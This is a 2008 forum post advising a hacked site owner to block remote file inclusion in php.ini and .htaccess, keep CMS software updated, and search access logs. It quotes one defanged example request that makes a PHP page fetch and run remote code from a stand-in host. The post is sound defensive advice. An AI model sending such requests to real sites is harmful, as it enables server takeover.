SteveWh - 7:51 pm on Apr 2, 2008 (gmt 0)

Echoing dial_d and lorax, be sure to create a php.ini file that prevents remote file inclusion. I believe GoDaddy permits php.ini, so use it. You can also block RFI attempts in your .htaccess file using a different method. If it won't damage the functionality of your site (you need to test it), it's best to put defensive code in *both* places.

If you use blog, forum, CMS, etc etc software (WordPress, for example), it *must* always be kept at the latest version or else your site is a sitting duck.

Note the timestamp of any file that was modified maliciously. Then search your access logs (FTP and HTTP) for who was accessing what at that moment. I think by default GoDaddy doesn't provide access logs, but they offer an add-on service that does, and it might be worth it. As an alternative, if you are somewhat proficient with PHP, you could probably create a header include file that would write the details of each access to your own private access log, to substitute for the server one.

RFI attacks are rampant these days. In your logs, they look similar to:

GET /index.php?inc=hxxp://someothersite.com/safe.txt?

If your php.ini file does not block RFI, then, as index.php runs, it retrieves the safe.txt file from the remote site. safe.txt is usually written in PHP and contains commands that modify files on your server, such as overwriting your .htaccess file. It is able to do that because it runs as if it were an integral part of your index.php file. It is a way hackers get their own code to run on your server as if you wrote it.

There are several other possibilities how this is occurring, but RFI is the first to defend against. If that doesn't work, start looking at the less common ones.

[edited by: SteveWh at 7:54 pm (utc) on April 2, 2008]